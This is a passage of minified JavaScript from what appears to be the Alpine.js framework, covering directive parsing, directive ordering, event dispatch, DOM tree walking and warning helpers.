i=r.match(lr()),o=r.match(/:([a-zA-Z0-9\-:]+)/),s=r.match(/\.[^.\]]+(?=[^\]]*$)/g)||[],a=t||e[r]||r;return{type:i?i[1]:null,value:o?o[1]:null,modifiers:s.map(c=>c.replace(".","")),expression:n,original:a}}}var _t="DEFAULT",H=["ignore","ref","data","id","bind","init","for","model","modelable","transition","show","if",_t,"teleport"];function On(e,t){let r=H.indexOf(e.type)===-1?_t:e.type,n=H.indexOf(t.type)===-1?_t:t.type;return H.indexOf(r)-H.indexOf(n)}function q(e,t,r={}){e.dispatchEvent(new CustomEvent(t,{detail:r,bubbles:!0,composed:!0,cancelable:!0}))}function A(e,t){if(typeof ShadowRoot=="function"&&e instanceof ShadowRoot){Array.from(e.children).forEach(i=>A(i,t));return}let r=!1;if(t(e,()=>r=!0),r)return;let n=e.firstElementChild;for(;n;)A(n,t,!1),n=n.nextElementSibling}function T(e,...t){console.warn(`Alpine Warning: ${e}`,...t)}function ur(){document.body||T("Unable to initialize. Trying to load Alpine before `` is available. Did you forget to add `defer` in Alpine's `